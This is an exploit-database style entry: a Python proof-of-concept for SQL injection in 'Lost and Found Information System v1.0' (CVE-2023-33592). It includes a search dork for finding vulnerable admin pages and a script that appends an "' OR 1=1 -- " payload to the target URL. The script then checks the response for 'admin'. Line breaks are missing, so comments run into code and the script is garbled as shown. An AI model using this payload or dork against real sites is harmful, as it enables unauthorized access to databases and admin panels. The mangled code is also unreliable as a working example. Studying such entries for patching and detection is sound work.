# Exploit Title: Lost and Found Information System v1.0 - SQL Injection# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : webapps# Dork : /php-lfis/admin/?page=system_info/contact_information# Tested on: Windows/Linux# CVE : CVE-2023-33592import requests
# URL of the vulnerable component
url ="http://example.com/php-lfis/admin/?page=system_info/contact_information"# Injecting a SQL query to exploit the vulnerability
payload ="' OR 1=1 -- "# Send the request with the injected payload
response = requests.get(url + payload)# Check if the SQL injection was successfulif"admin"in response.text:print("SQL injection successful!")else:print("SQL injection failed.")